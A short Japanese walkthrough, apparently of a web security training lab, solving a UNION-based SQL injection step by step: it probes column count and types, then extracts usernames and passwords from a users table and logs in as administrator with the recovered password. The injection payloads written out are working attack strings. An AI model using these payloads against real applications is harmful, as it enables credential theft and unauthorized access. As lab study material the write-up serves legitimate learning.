Hello there, ('ω')ノ
まずは、Petsを選択して。
リクエストをリピータへ。
はじめにレスポンスからデータのカラム数の模索を。
GET /filter?category=Pets'+UNION+SELECT+NULL--
2つのデータカラムだと成功のレスポンスが。
GET /filter?category=Pets'+UNION+SELECT+NULL,NULL--
ちなみに3つのデータカラムだとエラーが。
GET /filter?category=Pets'+UNION+SELECT+NULL,NULL,NULL--
次にデータ型の模索を。
GET /filter?category=Pets'+UNION+SELECT+'abc',NULL--
1つ目のカラムは数値のようで。
GET /filter?category=Pets'+UNION+SELECT+123,NULL--
2つ目のカラムは、文字列で。
GET /filter?category=Pets'+UNION+SELECT+123,'abc'--
データベースには、usersというテーブルに。
usernameとpasswordの2つのカラムがあるとのことで。
文字列のカラムにはusernameとpasswordの2つのデータが含まれているようなので。
GET /filter?category=Pets'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
下記でログインすると。
administrator/34b4wga8jpvbj20nx8da
クリアできた。
Best regards, (^^ゞ